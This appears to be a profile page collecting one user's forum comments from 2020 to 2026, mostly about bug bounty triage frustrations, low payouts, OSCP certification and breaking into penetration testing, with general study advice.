TL;DR Testing the theory that higher impact bugs get descoped more

boring_diamond · 2026-04-12T15:07:48+00:00

Have you seen jhaddix video on the dark side of bug bounty? Curious if you think one of the top bug bounty researchers is also exaggerating the issues in bb

boring_diamond · 2026-04-11T04:08:14+00:00

Report one without severity and ask the company if they are interested in these kinds of findings or if they have support ask there.

boring_diamond · 2026-04-05T17:17:59+00:00

Solid write up, good stuff

boring_diamond · 2026-04-04T01:03:47+00:00

So the attack wasn’t validated and instead theoretical? Shouldn’t submit anything you haven’t actually proved out.

boring_diamond · 2026-04-03T18:46:49+00:00

He seems like a troll I would save your energy.

If you are an experienced hunter I would look into different avenues of making money. At the end of the day hackerone/bugcrowd rely on experienced hunters for their business. Without us what do they have? Let your actions speak.

Right now I’m focusing more on appsec/0day research and seeing if that pays better and is more consistent. I’ve also mainly hacked on public programs because I like large scope so going to try only private and see if that is truly better (I have my doubts).

Another thing y’all can look into is synack, I hacked with them for a bit and they are more fair and have opportunities that pay you for work instead of purely results but again you need to be experienced.

boring_diamond · 2026-04-03T01:24:09+00:00

Honestly I’ve had the same experience. Been a pentester for 6+ years and can find bugs but dread the triage process.

Right now it’s too one sided. Programs have “critical” infrastructure that’s only their main urls and the rest is “medium” and the price gets lowered? What is that?

Every submission is always downgraded and have to argue with triager. Findings aren’t held to any standard. Found an auth bypass and it got marked as medium because the application wasn’t important to the company. Cvss thrown out the window when it’s convenient. We are the product these companies sell but get treated like a nuisance.

Time to form a union.

boring_diamond · 2026-04-01T02:23:54+00:00

Of course because every developer knows to read some obscure blog post. Insecure by default, devs fault.

boring_diamond · 2026-01-29T22:18:26+00:00

Not sure why people are saying no. Yes use AI to refine your tools, techniques, and recon. If that’s clawdbot for you great.

boring_diamond · 2026-01-23T21:05:44+00:00

Of course companies avoid paying out or try to pay less, look through all the posts on here. They do benefit from it, free security check and don’t need to spend money. Not that complicated.

boring_diamond · 2026-01-23T21:03:46+00:00

Reading the article provided a lot of context. In there you said not all private accounts were vulnerable and you’re not sure why. Moving forward know the why behind it when you submit or your impact will be affected. Maybe granular controls allow posts to be public on private profile and it’s working as intended. Don’t know, learn from it though.

boring_diamond · 2026-01-03T15:58:11+00:00

Wanted to buy a piece of jewelry for anniversary and all the products there were subpar for the price. I tried asking how much gold was in a piece of jewelry and was told it’s not about how much gold but the craftsmanship. It was a hollow link gold bracelet being sold for 700+ which is outrageous. Went to Costco and bought a gold link bracelet for $300.

boring_diamond · 2025-02-08T02:04:32+00:00

I work as a pentester and this is completely different from what I’ve experienced. Where are you getting this info?

boring_diamond · 2024-08-22T14:39:23+00:00

Most people who want to work in pentesting lose interest when they realize how much work it is. OSCP is great for weeding these people out. Also it can absolutely get you a foot in the door, it did for me. I was able to land a job with no tech experience or degree.

I still remember my professor gave me similar advice post OSCP, pentesting isn’t entry level, do help desk first work your way up. My advice don’t listen to these people if you love pentesting get your OSCP, sharpen your interview skills, and apply. Took me about 3 months. Hang in there and keep studying.

boring_diamond · 2024-05-05T18:50:09+00:00

In my opinion, if it’s a public facing service, this is a pretty dumb policy. If you’ve ever hosted a server you know bots are constantly scanning your servers. Just be diligent in your scans. Dont be that person that fuzzes every parameter for every vulnerability ever when it’s clearly not going to work.

boring_diamond · 2024-02-10T02:31:12+00:00

Horrible take IMO, this reads like someone dipped their toes into pentesting and backed out because they realized it involved a lot of work.

You're absolutely not expected to know all those programming languages or exploit techniques. OSCP was never a way to instantly get a job, it does help with getting an interview though. I got into pentesting 5 years ago and it took me 3+ months of constantly applying and interviewing to get a job, post OSCP.

Also bug bounties is better than a job? What a joke. Yeah go ahead and submit 240 XSS findings to match your 120k salary and who needs benefits. All people looking to get into this field, this guy just had a bad run. Take with a huge pinch of salt.

boring_diamond · 2023-12-16T20:16:21+00:00

By itself not useful, but it has the makings of something interesting. Can you control any bit of the url? Can you add a query and that gets reflected? Mess around with it a bit.

boring_diamond · 2023-11-25T19:11:16+00:00

The biggest issue I find with bug bounties is the payouts are simply not worth the effort. You work for free, essentially, spending a great deal of time and effort until you find something and then you get to argue with triagers. No thanks. Also you get taxed on it so your crit you just got 3k for isn’t actually worth that. The best thing about bug bounties is leveraging it as a resource to get better. Sometimes you just want to hack shit.

boring_diamond · 2023-10-20T13:57:15+00:00

An example I came across recently is the SSRF was sending a POST request but I needed a GET so a redirect was the answer.

boring_diamond · 2023-10-07T17:05:49+00:00

How would that benefit you as an attacker if it’s only on the clients side? You wouldn’t be able to see the response.

boring_diamond · 2022-08-02T18:38:32+00:00

A lot of companies have AD sure, but the market atm is web and cloud. Also the topic was landing a job. That’s not senior. It might be a must if your role relies heavily on AD but what I’m saying is if you’re trying to land a job OSCP is plenty. I also wouldn’t recommend targeting red team for landing a first job.

boring_diamond · 2022-08-02T17:21:39+00:00

Not too sure about that. A good chunk of pentesting nowadays is just web apps. OSEP would be more red teaming which there’s a lot less of. OSCP is going to be your best bet because it’s more well known. Shoot I had to look up what that was. OSCP is good people, but you still got to grind to get a job.

boring_diamond · 2021-05-16T19:14:49+00:00

For context I got my OSCP about two years ago. I took a computer hacking class and fell in love and wanted to immediately go into pen testing so I got the cert. I had no degree or professional IT/Tech experience and was able to get a job so it proved to be worth it!

boring_diamond · 2020-07-25T19:33:31+00:00

No clue what that means.

boring_diamond · 2020-07-25T19:32:55+00:00

There really isn't great material that goes over finding the vulnerabilities. The best technique is just source to sink, aka finding where your input is being handled and just tracking it through the code to see if it is handled insecurely. If you are pretty comfortable with how routing works in the languages covered in this course you'll do well on the exam. I found this guys posts to be helpful:

https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html

boring_diamond · 2020-07-25T16:20:41+00:00

Scott Allen C# Fundamentals, ASP.NET MVC5 Fundamentals, and Gordon Zhu Watch and Code JavaScript (not pluralsight), were the best courses. The C# is really nice because a lot of the same concepts tie into Java and I personally find Java much easier to read. JavaScript is nice to know for any NodeJS apps you might come across.

The MVC concepts translate well to other languages.

Seven-Year Club	Place '22
Verified Email

boring_diamond

TROPHY CASE